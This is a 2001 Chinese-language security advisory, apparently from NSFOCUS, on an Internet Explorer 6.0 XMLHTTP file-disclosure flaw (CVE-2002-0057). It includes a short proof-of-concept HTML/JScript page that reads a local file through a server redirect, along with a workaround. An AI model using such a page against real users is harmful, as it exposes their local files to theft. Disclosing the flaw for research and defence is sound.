Microsoft IE XMLHTTP文件泄露漏洞
发布日期:2001-12-15
更新日期:2001-12-21
受影响系统:Microsoft Internet Explorer 6.0
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
描述:
BUGTRAQ ID:
3699
CVE(CAN) ID:
CVE-2002-0057
Microsoft Internet Explorer是和Windows系统捆绑的流行的Web浏览器。
与IE 6.0一起发布的XMLHTTP ActiveX控件存在漏洞,使攻击者可以获取浏览者本地主机上的文件。
当IE的XMLHTTP控件响应一个文件重定向请求时,它会去处理请求所指向的文件而并不会顾及URL协议。如果重定向指向的是本地文件系统里的文件,则文件的内容会暴露给调用XMLHTTP控件的脚本。这样就会导致用户敏感信息的泄露。
<*来源:jelmer (
jelmer@kuperus.xs4all.nl)
链接:
http://www.xs4all.nl/~jkuperus/bug.htm
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
jelmer (
jelmer@kuperus.xs4all.nl)提供了如下的漏洞测试方法:
访问Web服务器上有如下代码的HTML页面:
<html>
<head>
<title>Exploit</title>
<script language="jscript">
function doIt() {
// open the file on the users harddisk using a http redirect
var xmlhttp = new ActiveXObject ("Microsoft.XMLHTTP");
xmlhttp.Open("GET", "servlet/RedirectServlet?fileName=c:/jelmer.txt", false);
xmlhttp.Send();
alert(xmlhttp.responseText);
}
</script>
</head>
<body>
<button onclick="doIt()">Do it</button>
</body>
</html>
则攻击者就可以访问到c:/jelmer.txt文件,如果攻击者知道其它的文件名,他一样也可以访问到。
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在IE中设置禁止活动脚本和ActiveX控件的执行。
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp浏览次数:3415
严重程度:0(网友投票)